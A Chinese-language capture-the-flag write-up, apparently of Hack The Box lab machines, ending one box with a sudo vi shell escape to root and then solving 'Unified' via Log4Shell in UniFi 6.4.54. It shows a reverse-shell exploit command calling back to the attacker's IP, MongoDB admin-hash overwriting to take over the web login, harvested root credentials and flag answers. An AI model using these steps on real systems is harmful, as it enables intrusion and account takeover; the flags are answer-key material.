然后在 /var/www/html 目录下的 dashboard.php 中找到密码 P@s5w0rd!

postgres:P@s5w0rd!

可以看见 (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf，说明可以以 root 运行 vi

What program can the postgres user run as root using sudo?
:vi

Submit Flag

Submit user flag
:ec9b13ca4d6229cd5cc1e09980965bf7

Submit Flag

执行以 root 权限打开 vi

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf

之后输入

:!/bin/sh

因为在 vi 的命令模式下，输入 ! 代表强制执行，比如输入的 !/bin/sh，就代表以 shell 执行 /bin/sh

然后就成功提升到 root 权限

Submit root flag
:dd6e058e814260bc70e9bbdef2715849

Unified

Task 1

 nmap -sS -sV 10.129.119.72
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-05 19:38 CST
Nmap scan report for 10.129.119.72
Host is up (0.43s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
6789/tcp open  ibm-db2-admin?
8080/tcp open  http-proxy
8443/tcp open  ssl/nagios-nsca Nagios NSCA
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94SVN%I=7%D=3/5%Time=67C837E3%P=x86_64-pc-linux-gnu%r(
SF:GetRequest,84,"HTTP/1\.1\x20302\x20\r\nLocation:\x20http://localhost:80
SF:80/manage\r\nContent-Length:\x200\r\nDate:\x20Wed,\x2005\x20Mar\x202025
SF:\x2011:39:15\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(HTTPOptions,84,
SF:"HTTP/1\.1\x20302\x20\r\nLocation:\x20http://localhost:8080/manage\r\nC
SF:ontent-Length:\x200\r\nDate:\x20Wed,\x2005\x20Mar\x202025\x2011:39:16\x
SF:20GMT\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,24E,"HTTP/1\.1\x2
SF:0400\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Languag
SF:e:\x20en\r\nContent-Length:\x20435\r\nDate:\x20Wed,\x2005\x20Mar\x20202
SF:5\x2011:39:19\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html><
SF:html\x20lang=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80\x93\
SF:x20Bad\x20Request</title><style\x20type=\"text/css\">body\x20{font-fami
SF:ly:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;
SF:background-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-si
SF:ze:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20
SF:{color:black;}\x20\.line\x20{height:1px;background-color:#525D76;border
SF::none;}</style></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x93\x
SF:20Bad\x20Request</h1></body></html>")%r(FourOhFourRequest,24A,"HTTP/1\.
SF:1\x20404\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Lan
SF:guage:\x20en\r\nContent-Length:\x20431\r\nDate:\x20Wed,\x2005\x20Mar\x2
SF:02025\x2011:39:22\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20ht
SF:ml><html\x20lang=\"en\"><head><title>HTTP\x20Status\x20404\x20\xe2\x80\
SF:x93\x20Not\x20Found</title><style\x20type=\"text/css\">body\x20{font-fa
SF:mily:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:whit
SF:e;background-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-
SF:size:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x
SF:20{color:black;}\x20\.line\x20{height:1px;background-color:#525D76;bord
SF:er:none;}</style></head><body><h1>HTTP\x20Status\x20404\x20\xe2\x80\x93
SF:\x20Not\x20Found</h1></body></html>")%r(Socks5,24E,"HTTP/1\.1\x20400\x2
SF:0\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Language:\x20e
SF:n\r\nContent-Length:\x20435\r\nDate:\x20Wed,\x2005\x20Mar\x202025\x2011
SF::39:24\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html><html\x2
SF:0lang=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\
SF:x20Request</title><style\x20type=\"text/css\">body\x20{font-family:Taho
SF:ma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;backgro
SF:und-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size:16px
SF:;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{color:
SF:black;}\x20\.line\x20{height:1px;background-color:#525D76;border:none;}
SF:</style></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x
SF:20Request</h1></body></html>");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 227.57 seconds

nmap 扫

Which are the first four open ports?
:22,6789,8080,8443

Task 2

访问 8080 端口会重定向到 8443 ，然后

What is the title of the software that is running running on port 8443?
:UniFi Network

Task 3

What is the version of the software that is running?
:6.4.54

Task 4

直接搜 UniFi Network 6.4.54 CVE

What is the CVE for the identified vulnerability?
:CVE-2021-44228

Task 5

CVE-2021-44228

https://www.sprocketsecurity.com/blog/another-log4j-on-the-fire-unifi

记得检查一下 java 环境（因为我就是忘记检查 Java 环境然后一直失败）

apt update && apt install openjdk-11-jre maven
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jUnifi \ && cd Log4jUnifi && pip3 install -r requirements.txt
mvn package -f utils/rogue-jndi/

JNDI（Java Naming and Directory Interface）是一个应用程序设计的 API，一种标准的 Java 命名系统接口。如果程序定义了 JNDI 中的接口，那么就能通过接口的 API 去访问命令服务和目录服务。

What protocol does JNDI leverage in the injection?
:LDAP

Task 6

What tool do we use to intercept the traffic, indicating the attack was successful?
:tcpdump

Task 7

反弹 shell

python3 exploit.py -u https://10.129.61.149:8443 -i 10.10.16.45 -p 1234

What port do we need to inspect intercepted traffic for?
:389

Task 8

ps -aux 查看进程，找到 MongoDB 的端口 27117

What port is the MongoDB service running on?
:27117

Task 9

连接 MongoDB

mongo --port 27117
#查看所有数据库
show dbs

默认为 ace

What is the default database name for UniFi applications?
:ace

Task 10

What is the function we use to enumerate users within the database in MongoDB?
:db.admin.find()

Task 11

What is the function we use to update users within the database in MongoDB?
:db.admin.update()

Task 12

指定端口号然后连接数据库，枚举用户信息以 json 格式打印

mongo --port 27117 ace
db.admin.find().forEach(printjson);

部分内容

{
        "_id" : ObjectId("61ce278f46e0fb0012d47ee4"),
        "name" : "administrator",
        "email" : "administrator@unified.htb",
        "x_shadow" : "$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.",
        "time_created" : NumberLong(1640900495),
        "last_site_name" : "default",

用 hashid 查加密方式

┌──(root㉿butt3rf1y)-[/HTB/Machine/Unified/ ]
└─# hashid '$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.'
Analyzing '$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.'
[+] SHA-512 Crypt

不好爆破

用 mkpasswd 创建一个密码，然后把 x_shadow 用 db.admin.update() 命令更新到数据库去

└─# mkpasswd -m sha-512 admin
$6$FNM7rHlUpwRIziUu$StfsQybKkHHf9zZkIVQKhvmBD6ApJPzViW/C8EYVxFZlUrM8UHKwDYYLypajSW16dzK8gV9oX7IP5fSmeQSp71

db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$FNM7rHlUpwRIziUu$StfsQybKkHHf9zZkIVQKhvmBD6ApJPzViW/C8EYVxFZlUrM8UHKwDYYLypajSW16dzK8gV9oX7IP5fSmeQSp71"}});

使用 administrator:admin 登录进去，在 SETTING/Site/Device Authentication 找到 ssh 的密码 root:NotACrackablePassword4U2022

What is the password for the root user?
:NotACrackablePassword4U2022

Submit Flag

/home/michael 的 user.txt

Submit user flag
:6ced1a6a89e666c0620cdb10262ba127

Submit Flag

ssh 连进去就是 root 了

Submit root flag
:e50bc93c75b634e4b272d2f771c33681